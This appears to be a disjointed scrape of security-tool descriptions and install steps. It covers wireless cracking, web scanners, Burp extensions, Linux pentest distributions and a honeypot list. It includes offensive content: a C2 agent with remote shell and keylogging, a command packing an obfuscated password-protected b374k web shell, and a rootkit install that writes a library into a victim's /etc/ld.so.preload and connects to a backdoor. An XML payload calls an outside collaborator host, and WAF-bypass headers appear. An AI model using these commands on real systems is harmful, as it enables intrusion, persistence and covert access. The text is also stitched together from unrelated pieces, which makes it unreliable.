• brute force passwords in auth forms
• directory disclosure ( use PATH list to brute, and find HTTP status code )
• test list on input to find SQL Injection and XSS vulnerabilities

$ git clone https://github.com/CoolerVoid/0d1n/

$ sudo apt-get install libcurl-dev

$ sudo yum install libcurl-devel
$ make
$./0d1n

• Recommended to use Kali linux.
• Ettercap.
• Sslstrip.
• Airbase-ng include in aircrack-ng.
• DHCP.
• Nmap.

$ sudo apt-get install isc-dhcp-server

$ echo "deb http://ftp.de.debian.org/debian wheezy main " >> /etc/apt/sources.list
$ apt-get update && apt-get install isc-dhcp-server

$ sudo yum install dhcp

• 'Login Sequence Recorder' has been re-engineered from the ground-up to allow restricted areas to be scanned entirely automatically.
• Now tests for over 1200 WordPress-specific vulnerabilities in the WordPress core and plugins.
• Acunetix WVS Crawl data can be augmented using the output of: Fiddler .saz files, Burp Suite saved items, Burp Suite state files, HTTP Archive (.har) files, Acunetix HTTP Sniffer logs, Selenium IDE Scripts.
• Improved support for Java Frameworks (Java Server Faces [JSF], Spring and Struts) and Ruby on Rails.
• Increased web services support for web applications which make use of WSDL based web-services, Microsoft WCF-based web services and RESTful web services.
• Ships with a malware URL detection service, which is used to analyse all the external links found during a scan against a constantly updated database of Malware and Phishing URLs.

• Better documentation (wiki, manpages) and support (Forum, trac, IRC: #aircrack-ng on Freenode).
• More cards/drivers supported
• More OS and platforms supported
• PTW attack
• WEP dictionary attack
• Fragmentation attack
• WPA Migration mode
• Improved cracking speed
• Capture with multiple cards
• New tools: airtun-ng, packetforge-ng (improved arpforge), wesside-ng, easside-ng, airserv-ng, airolib-ng, airdriver-ng, airbase-ng, tkiptun-ng and airdecloak-ng
• Optimizations, other improvements and bug fixing
• …

Aircrack-ng Changelog

• Detection:
  • Cuckoo hooks detection (all kind of cuckoo hooks).
  • Suspicius data in own memory (without APIs, page per page scanning).
• Crash (Execute with arguments) (out of a sandbox these args dont crash the program):
  • -c1: Modify the RET N instruction of a hooked API with a higher value. Next call to API pushing more args into stack. If the hooked API is called from the Cuckoo's HookHandler the program crash because it only pushes the real API args then the modified RET N instruction corrupt the HookHandler's stack.

• Tools contained in Appie are running on host machine instead of running on virtual machine.
• Less Space Needed(Only 600MB compared to atleast 8GB of Virual Machine)
• As the name suggests it is completely Portable i.e it can be carried on USB Stick or on your own smartphone and your pentesting environment will go wherever you go without any differences.
• Awesome Interface

• New Application Data Section
•  Tree-view of the application’s folder/file structure
•  Ability to pull files
•  Ability to view files
•  Ability to edit files
•  Ability to extract databases
•  Dynamic proxy managed via the Dashboard
•  New application-reversing features
•  Updated ReFrameworker tool
•  Dynamic indicator for Android device status
•  Bugs and functionality fixes

• A Command aNd Control server, which is a Web interface to administer the agents
• An agent program, which is run on the compromised host, and ensures communication with the CNC

• remote cmd.exe shell
• persistence
• file upload/download
• screenshot
• key logging

Installation

Server

Agent

• requests
• pythoncom
• pyhook
• PIL

cd client/
pyinstaller --onefile --noconsole agent.py

$ git clone https://github.com/JulienPalard/vt100-emulator.git
$ aptitude install python-dev
$ make python_module
$ python setup.py install

$ ashttp -p 8080 top

$ ashttp -p 8080 watch -n 1 ls -lah /tmp

Description:

• ATSCAN Version 2 
• Dork scanner. 
• XSS scanner. 
• Sqlmap. 
• LFI scanner.
• Filter wordpress and Joomla sites in the server. 
• Find Admin page.
• Decode / Encode MD5 + Base64. 

Libreries to install:

ap-get install libxml-simple-perl

Permissions & Executution:

$chmod +x atscan.pl 
perl ./atscan.pl

Screenshots: 

• This tool is designed for IT professionals to perform penetration testing to scan and analyze NMAP results.

• Get the argument details of scan method: python AutoBrowser.py scan --help
• Scan with Nmap and Checks the results and create folder by name project_name: python AutoBrowser.py scan "192.168.1.1/24" -a="-sT -sV -T3" -p project_name
• Get the argument details of analyze method: python AutoBrowser.py analyze --help
• Analyzing Nmap XML report and create folder by name report_analyze: python AutoBrowser.py analyze nmap_file.xml --project report_analyze

1. sudo apt-get install python-pip python2.7-dev libxext-dev python-qt4 qt4-dev-tools build-essential nmap
2. sudo pip install -r requirements.txt

1. Install Xcode Command Line Tools (AppStore)
2. ruby -e "$(curl -fsSL https://raw.github.com/mxcl/homebrew/go)"
3. brew install pyqt nmap
4. sudo easy_install pip
5. sudo pip install -r requirements.txt

1. Install setuptools
2. Install pip
3. Install PyQt4
4. install Nmap
5. Open Command Prompt(cmd) as Administrator -> Goto python folder -> Scripts (cd c:\Python27\Scripts)
6. pip install -r (Full Path To requirements.txt)

BSSID CHANNEL ESSID

AA:BB:CC:DD:EE:FF 1 MyWlan 
00:BB:CC:DD:EE:FF 13 TpLink 
00:22:33:DD:EE:FF 13 MyHomeSSID

• Every line of list file is checked separately in for loop
• After every AP on the list once, script automatically changes MAC address of your card to random MAC using macchanger (you can also setup your own MAC if you need),
• Whole list is checked again and again, in endless while loop, until there is nothing to check loop is stopped,
• Found PINS/WPA PASSPHRASES are stored in {CRACKED_LIST_FILE_PATH} file.

• Wireless adapter which supports injection (see [https://code.google.com/p/reaver-wps/wiki/SupportedWirelessDrivers Reaver Wiki])
• Linux Backtrack 5
• Root access on your system (otherwise some things may not work)
• AND if you use other Linux distribution*
  • Reaver 1.4 (I didn't try it with previous versions)
  • KDE (unless you'll change 'konsole' invocations to 'screen', 'gnome-terminal' or something like that... this is easy)
  • Gawk (Gnu AWK)
  • Macchanger
  • Airmon-ng, Airodump-ng, Aireplay-ng
  • Wash (WPS Service Scanner)
  • Perl

git clone https://code.google.com/p/auto-reaver/

cd ./auto-reaver

chmod 700 ./washAutoReaver
chmod 700 ./autoReaver

./washAutoReaverList > myAPTargets

cat ./myAPTargets

./autoReaver myAPTargets

• Script logs dates of PIN attempts, so you can check how often AP is locked and for how long. Default directory for those logs is ReaverLastPinDates.
• Script logs each AP rate limit for every AP (default directory is /tmp/APLimitBSSID), so you can easily check when last rate limit occured
• You can setup your attack using variables from configurationSettings file (sleep/wait times between AP`s and loops, etc.)
• You can disable checking AP by adding "#" sign in the beginning of line, in myAPTargets file (then AP will be ommited in loop)
• (added 2014-07-03) You can setup specific settings per access point.
  To do that for AP with MAC AA:BB:CC:DD:EE:FF, just create file ./configurationSettingsPerAp/AABBCCDDEEFF
  and put there variables from ./configurationSettings file that you want to change for example:
  

  ADDITIONAL_OPTIONS="-g 10 -E -S -N -T 1 -t 15 -d 0 -x 3";

AA:BB:CC:DD:EE:FF R MyWlan

1. Download Burp Suite (obviously): http://portswigger.net/burp/download.html
2. Download Jython standalone JAR: http://www.jython.org/downloads.html
3. Open burp -> Extender -> Options -> Python Environment -> Select File -> Choose the Jython standalone JAR
4. Install Autorize from the BApp Store or follow these steps:
5. Download the Autorize.py file.
6. Open Burp -> Extender -> Extensions -> Add -> Choose Autorize.py file.
7. See the Autorize tab and enjoy automatic authorization detection :)

1. After installation, the Autorize tab will be added to Burp.
2. Open the configuration tab (Autorize -> Configuration).
3. Get your low-privileged user authorization token header (Cookie / Authorization) and copy it into the textbox containing the text "Insert injected header here".
4. Click on "Intercept is off" to start intercepting the traffic in order to allow Autorize to check for authorization enforcement.
5. Open a browser and configure the proxy settings so the traffic will be passed to Burp.
6. Browse to the application you want to test with a high privileged user.
7. The Autorize table will show you the request's URL and enforcement status.
8. It is possible to click on a specific URL and see the original/modified request/response in order to investigate the differences.

1. Authorization bypass! - Red color
2. Authorization enforced! - Green color
3. Authorization enforced??? (please configure enforcement detector) - Yellow color

• Perform an efficient malware analysis of suspicious files based on the results of a set of antivirus solutions, bundled together to reach the highest possible probability to detect potential malware;
• Search for malware samples in a progressively increasing malware repository.

• Download malware samples (15 samples/day for registered users and 100 samples/day for premium users);
• Perform confidential malware analysis (reserved to premium users)

• Submit suspicious file via AVCaesar web interface. Premium users can choose to perform a confidential analysis.
• Receive a well-structured malware analysis report.

• File manager (view, edit, rename, delete, upload, download, archiver, etc)
• Search file, file content, folder (also using regex)
• Command execution
• Script execution (php, perl, python, ruby, java, node.js, c)
• Give you shell via bind/reverse shell connect
• Simple packet crafter
• Connect to DBMS (mysql, mssql, oracle, sqlite, postgresql, and many more using ODBC or PDO)
• SQL Explorer
• Process list/Task manager
• Send mail with attachment (you can attach local file on server)
• String conversion
• All of that only in 1 file, no installation needed
• Support PHP > 4.3.3 and PHP 5

• PHP version > 4.3.3 and PHP 5
• As it using zepto.js v1.1.2, you need modern browser to use b374k shell. See browser support on zepto.js website http://zeptojs.com/
• Responsibility of what you do with this shell

$ php -f index.php
b374k shell packer 0.4

options :
        -o filename                             save as filename
        -p password                             protect with password
        -t theme                                theme to use
        -m modules                              modules to pack separated by comma
        -s                                      strip comments and whitespaces
        -b                                      encode with base64
        -z [no|gzdeflate|gzencode|gzcompress]   compression (use only with -b)
        -c [0-9]                                level of compression
        -l                                      list available modules
        -k                                      list available themes

$ php -f index.php -- -o myShell.php -p myPassword -s -b -z gzcompress -c 9

• Preinstalled Linux Kernel 3.16
• New Ubuntu 14.04.2 base
• Ruby 2.1
• Installer with LVM and Full Disk Encryption options
• Handy Thunar custom actions
• RAM wipe at shutdown/reboot
• System improvements
• Upstream components
• Bug corrections
• Performance boost
• Improved Anonymous mode
• Predisposition to ARM architecture (armhf Debian packages)
• Predisposition to BackBox Cloud platform
• New and updated hacking tools: beef-project, crunch, fang, galleta, jd-gui, metasploit-framework, pasco, pyew, rifiuti2, setoolkit, theharvester, tor, torsocks, volatility, weevely, whatweb, wpscan, xmount, yara, zaproxy

• 32-bit or 64-bit processor
• 512 MB of system memory (RAM)
• 6 GB of disk space for installation
• Graphics card capable of 800×600 resolution
• DVD-ROM drive or USB port (2 GB)

• Preinstalled Linux Kernel 3.16
• New Ubuntu 14.04.2 base
• Ruby 2.1
• Installer with LVM and Full Disk Encryption options
• Handy Thunar custom actions
• RAM wipe at shutdown/reboot
• System improvements
• Upstream components
• Bug corrections
• Performance boost
• Improved Anonymous mode
• Predisposition to ARM architecture (armhf Debian packages)
• Predisposition to BackBox Cloud platform
• New and updated hacking tools: beef-project, btscanner, dirs3arch, metasploit-framework, ophcrack, setoolkit, tor, weevely, wpscan, etc.

• 32-bit or 64-bit processor
• 512 MB of system memory (RAM)
• 6 GB of disk space for installation
• Graphics card capable of 800×600 resolution
• DVD-ROM drive or USB port (2 GB)

sudo apt-get update
sudo apt-get dist-upgrade
sudo apt-get install -f
sudo apt-get install linux-image-generic-lts-utopic linux-headers-generic-lts-utopic linux-signed-image-generic-lts-utopic
sudo apt-get purge ri1.9.1 ruby1.9.1 ruby1.9.3 bundler
sudo gem cleanup
sudo rm -rf /var/lib/gems/1.*
sudo apt-get install backbox-default-settings backbox-desktop backbox-tools --reinstall
sudo apt-get install beef-project metasploit-framework whatweb wpscan setoolkit --reinstall
sudo apt-get autoremove --purge

• Preinstalled Linux Kernel 3.19
• New Ubuntu 14.04.3 base
• Ruby 2.1
• Installer with LVM and Full Disk Encryption options
• Handy Thunar custom actions
• RAM wipe at shutdown/reboot
• System improvements
• Upstream components
• Bug corrections
• Performance boost
• Improved Anonymous mode
• Automotive Analysis category
• Predisposition to ARM architecture (armhf Debian packages)
• Predisposition to BackBox Cloud platform
• New and updated hacking tools: apktool, armitage, beef-project, can-utils, dex2jar, fimap, jd-gui, metasploit-framework, openvas, setoolkit, sqlmap, tor, weevely, wpscan, zaproxy, etc.

• 32-bit or 64-bit processor
• 512 MB of system memory (RAM)
• 6 GB of disk space for installation
• Graphics card capable of 800×600 resolution
• DVD-ROM drive or USB port (2 GB)

sudo apt-get update
sudo apt-get dist-upgrade
sudo apt-get install -f
sudo apt-get install linux-image-generic-lts-vivid linux-headers-generic-lts-vivid linux-signed-image-generic-lts-vivid
sudo apt-get purge ri1.9.1 ruby1.9.1 ruby1.9.3 bundler
sudo gem cleanup
sudo rm -rf /var/lib/gems/1.*
sudo apt-get install backbox-default-settings backbox-desktop backbox-menu backbox-tools --reinstall
sudo apt-get install beef-project metasploit-framework whatweb wpscan setoolkit --reinstallsudo apt-get autoremove --purge
sudo apt-get install openvas sqlite3
sudo openvas-launch sync
sudo openvas-launch start

$ sudo apt-get install libffi-dev build-essential python-dev python-pip libssl-dev libxml2-dev libxslt1-dev
$ pip install pydes --allow-external pydes --allow-unverified pydes
$ pip install beeswarm
Downloading/unpacking beeswarm
...
Successfully installed Beeswarm
Cleaning up...
$ mkdir server_workdir
$ cd server-workdir/
$ beeswarm --server
...
****************************************************************************
Default password for the admin account is: uqbrlsabeqpbwy
****************************************************************************
...

• URLs being visited.
• HTTPS host being visited.
• HTTP POSTed data.
• FTP credentials.
• IRC credentials.
• POP, IMAP and SMTP credentials.
• NTLMv1/v2 ( HTTP, SMB, LDAP, etc ) credentials.

• Hide attacker files and directories
• Realtime log cleanup (on utmp/wtmp )
• Anti process and login detection
• Bypass unhide, lsof, ps, ldd, netstat analysis
• Furtive PTY backdoor client

• ptrace(2) hooking for anti-debugging
• libpcap hooking undermines local sniffers
• PAM backdoor for local privilege escalation

• Compile

    git clone https://github.com/unix-thrust/beurk.git
    cd beurk
    make

• Install

    scp libselinux.so root@victim.com:/lib/
    ssh root@victim.com 'echo /lib/libselinux.so >> /etc/ld.so.preload'

• Enjoy !

    ./client.py victim_ip:port # connect with furtive backdoor

• libpcap - to avoid local sniffing
• libpam - for local PAM backdoor
• libssl - for encrypted backdoor connection

    apt-get install libpcap-dev libpam-dev libssl-dev

• added more than 30 new tools
• updated system packages including linux kernel 4.1.3
• updated all tools
• added new color config for vim
• replace splash.png
• deleted blackarch-install.txt
• updated /root/README
• fixed typos in ISO config files

• added more than 100 new tools
• updated system packages
• include linux kernel 4.2.5
• updated all tools
• updated menu entries for window managers
• added (correct) multilib support
• added more fonts
• added missing group 'vboxsf'

• x86 and x64 support
• Process interaction
  
  • Manage PEB32/PEB64
  • Manage process through WOW64 barrier
• Process Memory
  
  • Allocate and free virtual memory
  • Change memory protection
  • Read/Write virtual memory
• Process modules
  
  • Enumerate all (32/64 bit) modules loaded. Enumerate modules using Loader list/Section objects/PE headers methods.
  • Get exported function address
  • Get the main module
  • Unlink module from loader lists
  • Inject and eject modules (including pure IL images)
  • Inject 64bit modules into WOW64 processes
  • Manually map native PE images
• Threads
  
  • Enumerate threads
  • Create and terminate threads. Support for cross-session thread creation.
  • Get thread exit code
  • Get main thread
  • Manage TEB32/TEB64
  • Join threads
  • Suspend and resume threads
  • Set/Remove hardware breakpoints
• Pattern search
  
  • Search for arbitrary pattern in local or remote process
• Remote code execution
  
  • Execute functions in remote process
  • Assemble own code and execute it remotely
  • Support for cdecl/stdcall/thiscall/fastcall conventions
  • Support for arguments passed by value, pointer or reference, including structures
  • FPU types are supported
  • Execute code in new thread or any existing one
• Remote hooking
  
  • Hook functions in remote process using int3 or hardware breakpoints
  • Hook functions upon return
• Manual map features
  
  • x86 and x64 image support
  • Mapping into any arbitrary unprotected process
  • Section mapping with proper memory protection flags
  • Image relocations (only 2 types supported. I haven't seen a single PE image with some other relocation types)
  • Imports and Delayed imports are resolved
  • Bound import is resolved as a side effect, I think
  • Module exports
  • Loading of forwarded export images
  • Api schema name redirection
  • SxS redirection and isolation
  • Activation context support
  • Dll path resolving similar to native load order
  • TLS callbacks. Only for one thread and only with PROCESS_ATTACH/PROCESS_DETACH reasons.
  • Static TLS
  • Exception handling support (SEH and C++)
  • Adding module to some native loader structures(for basic module api support: GetModuleHandle, GetProcAdress, etc.)
  • Security cookie initialization
  • C++/CLI images are supported
  • Image unloading
  • Increase reference counter for import libraries in case of manual import mapping
  • Cyclic dependencies are handled properly
• Driver features
• Allocate/free/protect user memory
• Read/write user and kernel memory
• Disable permanent DEP for WOW64 processes
• Change process protection flag
• Change handle access rights
• Remap process memory
• Hiding allocated user-mode memory
• User-mode dll injection and manual mapping
• Manual mapping of drivers

• Automatically scans your current minidump folder and displays the list of all crash dumps, including crash dump date/time and crash details.
• Allows you to view a blue screen which is very similar to the one that Windows displayed during the crash.
• BlueScreenView enumerates the memory addresses inside the stack of the crash, and find all drivers/modules that might be involved in the crash.
• BlueScreenView also allows you to work with another instance of Windows, simply by choosing the right minidump folder (In Advanced Options).
• BlueScreenView automatically locate the drivers appeared in the crash dump, and extract their version resource information, including product name, file version, company, and file description. 

  pip -V

  curl https://bootstrap.pypa.io/get-pip.py -o - | python

  sudo pip install git+git://github.com/RandomStorm/Bluto

  bluto

  sudo pip install git+git://github.com/RandomStorm/Bluto --upgrade

• an implementation of the FlowTags framework for the OpenDaylight controller
• an implementation of the resource management algorithms
• a topology file that was used to simulate an ISP topology
• scripts that facilitate functions such as spawning, tearing down and retrieving the topology.
• scripts that automate and coordinate the components required for the usecases examined.

• Bro
• Snort
• Balancer
• Iptables
• Iperf
• Custom scripts to simulate the attacks

• Open ports
• DNS domains
• Web files
• Web directories
• Usernames
• Passwords

./brutex target

• NMap
• Hydra
• Wfuzz
• SNMPWalk
• DNSDict

• Pebble Steel smart watch
• Moto 360 smart watch
• OBDLink OBD-II Bluetooth Dongle
• Withings Smart Baby Monitor

• Need at least 1 Bluetooth card (either USB or internal).
• Need to be running Linux, another *nix, or OS X.
• BlueZ 4

sudo apt-get install bluez bluez-utils bluez-tools libbluetooth-dev python-dev

sudo python setup.py install

btproxy <master-bt-mac-address> <slave-bt-mac-address>

# This will connect to the slave 40:14:33:66:CC:FF device and 
# wait for a connection from the master F1:64:F3:31:67:88 device
btproxy F1:64:F3:31:67:88 40:14:33:66:CC:FF

hcitool scan
hcitool inq

sdptool records <bt-address>

# replace.py
def master_cb(req):
    """
        Received something from master, about to be sent to slave.
    """
    print '<< ', repr(req)
    open('mastermessages.log', 'a+b').write(req)
    return req

def slave_cb(res):
    """
        Same as above but it's from slave about to be sent to master
    """
    print '>> ', repr(res)
    open('slavemessages.log', 'a+b').write(res)
    return res

• BLE
• Improve the file logging of the traffic and make it more interactive for
• replays/manipulation.
• Indicate which service is which in the output.
• Provide control for disconnecting/connecting services.
• PCAP file support
• ncurses?

    # See the list of all adaptors
    hciconfig -a

    # Enable
    sudo hciconfig hciX up

    # if you get this message
    Can't init device hci0: Operation not possible due to RF-kill (132)

    # Then try unblocking it with the rfkill command
    sudo rfkill unblock all

chmod g-rw,o-x <path>/.python-eggs

]]>>

<nzf xmlns="http://a.b/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://kuiqswhjt3era6olyl63pyd.burpcollaborator.net/nzf.xsd">
nzf</nzf>

• Some bugs affecting the saving and restoring of Burp state files.
• A bug in the Collaborator server where the auto-generated self-signed certificate does not use a wildcard prefix in the CN. This issue only affects private Collaborator server deployments where a custom SSL certificate has not been configured.

• Oracle JDK >=8u50 and <9 ( Download )
• At least 4GB of RAM

1. Download the latest prebuilt release from the GitHub releases page .
2. Open BurpSuite and navigate to the Extender tab.
3. Under Burp Extensions click the Add button.
4. In the Load Burp Extension dialog, make sure that Extension Type is set to Java and click the Select file ... button under Extension Details .
5. Select the BurpKit-<version>.jar file and click Next when done.

1. BurpKitty : a courtesy browser for navigating the web within BurpSuite.
2. BurpScript IDE : a lightweight integrated development environment for writing JavaScript-based BurpSuite plugins and other things.
3. Jython : an integrated python interpreter console and lightweight script text editor.

1. burpKit : provides numerous features including file system I/O support and easy JS library injection.
2. burpCallbacks : the JavaScript equivalent of the IBurpExtenderCallbacks interface in Java with a few slight modifications.

• learning about web application security
• testing manual assessment techniques
• testing automated tools
• testing source code analysis tools
• observing web attacks
• testing WAFs and similar code technologies

  X-Originating-IP: 127.0.0.1
  X-Forwarded-For: 127.0.0.1
  X-Remote-IP: 127.0.0.1
  X-Remote-Addr: 127.0.0.1

1. Add extension to burp
2. Create a session handling rule in Burp that invokes this extension
3. Modify the scope to include applicable tools and URLs
4. Configure the bypass options on the "Bypass WAF" tab
5. Test away

1. Users can modify the X-Originating-IP, X-Forwarded-For, X-Remote-IP, X-Remote-Addr headers sent in each request. This is probably the top bypass technique i the tool. It isn't unusual for a WAF to be configured to trust itself (127.0.0.1) or an upstream proxy device, which is what this bypass targets.
2. The "Content-Type" header can remain unchanged in each request, removed from all requests, or by modified to one of the many other options for each request. Some WAFs will only decode/evaluate requests based on known content types, this feature targets that weakness.
3. The "Host" header can also be modified. Poorly configured WAFs might be configured to only evaluate requests based on the correct FQDN of the host found in this header, which is what this bypass targets.
4. The request type option allows the Burp user to only use the remaining bypass techniques on the given request method of "GET" or "POST", or to apply them on all requests.
5. The path injection feature can leave a request unmodified, inject random path info information (/path/to/example.php/randomvalue?restofquery), or inject a random path parameter (/path/to/example.php;randomparam=randomvalue?resetofquery). This can be used to bypass poorly written rules that rely on path information.
6. The path obfuscation feature modifies the last forward slash in the path to a random value, or by default does nothing. The last slash can be modified to one of many values that in many cases results in a still valid request but can bypass poorly written WAF rules that rely on path information.
7. The parameter obfuscation feature is language specific. PHP will discard a + at the beginning of each parameter, but a poorly written WAF rule might be written for specific parameter names, thus ignoring parameters with a + at the beginning. Similarly, ASP discards a % at the beginning of each parameter.
8. The "Set Configuration" button activates all the settings that you have chosen.

Features at a glance

• Simple for anyone to use. Just type a message, click Encrypt, and go
• Handles messages and file attachments together easily
• End-to-end encryption, performed entirely on the user's machine
• No dependence on any specific intermediary channel. Works with any communication method available
• Uses three strong cryptographic algorithms in combination to triple-protect data
• Optional steganography feature for embedding encrypted data within a Jpeg image
• No installation needed - fully portable application can be run from anywhere
• Unencrypted data is never written to disk - unless requested by the user
• Multiple input/output modes for convenient operation

Technical details

• Open source, written in C++
• AES/Rijndael, Twofish and Serpent ciphers (256-bit keysize variants), cascaded together in CTR mode for triple-encryption of messages and files
• HMAC-SHA-256 for construction of message authentication code
• PBKDF2-HMAC-SHA256 for derivation of separate AES, Twofish and Serpent keys from user-chosen passphrase
• Cryptographically safe pseudo-random number generator ISAAC for production of Initialization Vectors (AES/Twofish/Serpent) and Salts (PBKDF2)

cheat tar

# To extract an uncompressed archive: 
tar -xvf /path/to/foo.tar

# To extract a .gz archive:
tar -xzvf /path/to/foo.tgz

# To create a .gz archive:
tar -czvf /path/to/foo.tgz /path/to/foo/

# To extract a .bz2 archive:
tar -xjvf /path/to/foo.tgz

# To create a .bz2 archive:
tar -cjvf /path/to/foo.tgz /path/to/foo/

sudo pip install cheat

brew install cheat

sudo pip install docopt pygments

sudo python setup.py install

cheat -e foo

• Field Name
• Value
• Total Used Count
• First Used Date
• Last Used Date

• Instantly view all the Autofill list from Chrome browser
• On startup, it auto detects Autofill file from Chrome's default profile location
• Sort feature to arrange the data in various order to make it easier to search through 100's of entries.
• Delete all the Autofill data with just a click of button
• Save the displayed Autofill list to HTML/XML/TEXT/CSV file
• Easier and faster to use with its enhanced user friendly GUI interface
• Fully Portable, does not require any third party components like JAVA, .NET etc
• Support for local Installation and uninstallation of the software

• Launch ChromeAutofillViewer on your system
• By default it will automatically find and display the autofill file from default profile location of Chrome. You can also select the desired file manually.
• Next click on 'Show All' button and all stored Autofill data will be displayed in the list as shown in screenshot 1 below.
• If you want to remove all the entries, click on 'Delete All' button below.
• Finally you can save all displayed entries to HTML/XML/TEXT/CSV file by clicking on 'Export' button and then select the type of file from the drop down box of 'Save File Dialog'.

git clone https://github.com/Dionach/CMSmap.git

CMSmap tool v0.3 - Simple CMS Scanner
Author: Mike Manzotti mike.manzotti@dionach.com
Usage: cmsmap.py -t <URL>
          -t, --target    target URL (e.g. 'https://abc.test.com:8080/')
          -v, --verbose   verbose mode (Default: false)
          -T, --threads   number of threads (Default: 5)
          -u, --usr       username or file 
          -p, --psw       password or file
          -i, --input     scan multiple targets listed in a given text file
          -o, --output    save output in a file
          -k, --crack     password hashes file
          -w, --wordlist  wordlist file (Default: rockyou.txt - WordPress only)       
          -a, --agent     set custom user-agent  
          -U, --update    (C)MSmap, (W)ordpress plugins and themes, (J)oomla components, (D)rupal modules
          -f, --force     force scan (W)ordpress, (J)oomla or (D)rupal
          -F, --fullscan  full scan using large plugin lists. Slow! (Default: false)
          -h, --help      show this help   

Example: cmsmap.py -t https://example.com
         cmsmap.py -t https://example.com -f W -F
         cmsmap.py -t https://example.com -i targets.txt -o output.txt
         cmsmap.py -t https://example.com -u admin -p passwords.txt
         cmsmap.py -k hashes.txt

• Docker >=1.8 (required for file upload API)
• Go >=1.4
• godep

# set your $GOPATH
go get github.com/codetainerapp/codetainer  
# you may get errors about not compiling due to Asset missing, it's ok. bindata.go needs to be created
# by `go generate` first.
cd $GOPATH/src/github.com/codetainerapp/codetainer
# make install_deps  # if you need the dependencies like godep
make

DOCKER_OPTS="-H tcp://127.0.0.1:4500 -H unix:///var/run/docker.sock"

# Docker API server and port
DockerServer = "localhost"
DockerPort = 4500

# Enable TLS support (optional, if you access to Docker API over HTTPS)
# DockerServerUseHttps = true
# Certificate directory path (optional)
#   e.g. if you use Docker Machine: "~/.docker/machine/certs"
# DockerCertPath = "/path/to/certs"

# Database path (optional, default is ~/.codetainer/codetainer.db)
# DatabasePath = "/path/to/codetainer.db"

$ sudo docker pull ubuntu:14.04
$ codetainer image register ubuntu:14.04
$ codetainer create ubuntu:14.04 my-codetainer-name
$ codetainer server  # to start the API server on port 3000

1. Copy codetainer.js to your webapp.
2. Include codetainer.js and jquery in your web page. Create a div to house the codetainer terminal iframe (it's #terminal in the example below).
   

   <!DOCTYPE html>
   <html>
   <head>
     <meta charset="UTF-8">
     <title>lsof tutorial</title>
     <link rel='stylesheet' href='/stylesheets/style.css' />
     <script src="http://code.jquery.com/jquery-1.10.1.min.js"></script>
     <script src="/javascripts/codetainer.js"></script>
     <script src="/javascripts/lsof.js"></script>
   </head>
   <body>
      <div id="terminal" data-container="YOUR CODETAINER ID HERE"> 
   </body>
   </html> 

3. Run the javascript to load the codetainer iframe from the codetainer API server (supply data-container as the id of codetainer on the div, or supply codetainer in the constructor options).
   

 $('#terminal').codetainer({
     terminalOnly: false,                 // set to true to show only a terminal window 
     url: "http://127.0.0.1:3000",        // replace with codetainer server URL
     container: "YOUR CONTAINER ID HERE",
     width: "100%",
     height: "100%",
  });

Honeypots

• Database Honeypots
  
  • Elastic honey - A Simple Elasticsearch Honeypot
  • mysql - A mysql honeypot, still very very early stage
  • A framework for nosql databases ( only redis for now) - The NoSQL Honeypot Framework
  • ESPot - ElasticSearch Honeypot
• Web honeypots
  
  • Glastopf - Web Application Honeypot
  • phpmyadmin_honeypot - - A simple and effective phpMyAdmin honeypot
  • servlet - Web application Honeypot
  • Nodepot - A nodejs web application honeypot
  • basic-auth-pot bap - http Basic Authentication honeyPot
  • Shadow Daemon - A modular Web Application Firewall / High-Interaction Honeypot for PHP, Perl & Python apps
  • Servletpot - Web application Honeypot
  • Google Hack Honeypot - designed to provide reconnaissance against attackers that use search engines as a hacking tool against your resources.
  • smart-honeypot - PHP Script demonstrating a smart honey pot
  • HonnyPotter - A WordPress login honeypot for collection and analysis of failed login attempts.
  • wp-smart-honeypot - WordPress plugin to reduce comment spam with a smarter honeypot
  • wordpot - A WordPress Honeypot
  • Bukkit Honeypot Honeypot - A honeypot plugin for Bukkit
  • Laravel Application Honeypot - Honeypot - Simple spam prevention package for Laravel applications
  • stack-honeypot - Inserts a trap for spam bots into responses
  • EoHoneypotBundle - Honeypot type for Symfony2 forms
  • shockpot - WebApp Honeypot for detecting Shell Shock exploit attempts
• Service Honeypots
  
  • Kippo - Medium interaction SSH honeypot
  • honeyntp - NTP logger/honeypot
  • honeypot-camera - observation camera honeypot
  • troje - a honeypot built around lxc containers. It will run each connection with the service within a seperate lxc container.
  • slipm-honeypot - A simple low-interaction port monitoring honeypot
  • HoneyPy - A low interaction honeypot
  • Ensnare - Easy to deploy Ruby honeypot
  • RDPy - A Microsoft Remote Desktop Protocol (RDP) honeypot in python
• Anti-honeypot stuff
  
  • kippo_detect - This is not a honeypot, but it detects kippo. (This guy has lots of more interesting stuff)
• ICS/SCADA honeypots
  
  • Conpot - ICS/SCADA honeypot
  • scada-honeynet - mimics many of the services from a popular PLC and better helps SCADA researchers understand potential risks of exposed control system devices
  • SCADA honeynet - Building Honeypots for Industrial Networks
• Deployment
  
  • Dionaea and EC2 in 20 Minutes - a tutorial on setting up Dionaea on an EC2 instance
  • honeypotpi - Script for turning a Raspberry Pi into a Honey Pot Pi
• Data Analysis
  
  • Kippo-Graph - a full featured script to visualize statistics from a Kippo SSH honeypot
  • Kippo stats - Mojolicious app to display statistics for your kippo SSH honeypot
• Other/random
  
  • NOVA uses honeypots as detectors, looks like a complete system.
  • Open Canary - A low interaction honeypot intended to be run on internal networks.
  • libemu - Shellcode emulation library, useful for shellcode detection.
• Open Relay Spam Honeypot
  
  • SpamHAT - Spam Honeypot Tool
• Botnet C2 monitor
  
  • Hale - Botnet command & control monitor
• IPv6 attack detection tool
  
  • ipv6-attack-detector - Google Summer of Code 2012 project, supported by The Honeynet Project organization
• Research Paper
  
  • vEYE - behavioral footprinting for self-propagating worm detection and profiling
• Honeynet statistics
  
  • HoneyStats - A statistical view of the recorded activity on a Honeynet
• Dynamic code instrumentation toolkit
  
  • Frida - Inject JavaScript to explore native apps on Windows, Mac, Linux, iOS and Android
• Front-end for dionaea
  
  • DionaeaFR - Front Web to Dionaea low-interaction honeypot
• Tool to convert website to server honeypots
  
  • HIHAT - ransform arbitrary PHP applications into web-based high-interaction Honeypots
• Malware collector
  
  • Kippo-Malware - Python script that will download all malicious files stored as URLs in a Kippo SSH honeypot database
• Sebek in QEMU
  
  • Qebek - QEMU based Sebek. As Sebek, it is data capture tool for high interaction honeypot
• Malware Simulator
  
  • imalse - Integrated MALware Simulator and Emulator
• Distributed sensor deployment
  
  • Smarthoneypot - custom honeypot intelligence system that is simple to deploy and easy to manage
  • Modern Honey Network - Multi-snort and honeypot sensor management, uses a network of VMs, small footprint SNORT installations, stealthy dionaeas, and a centralized server for management
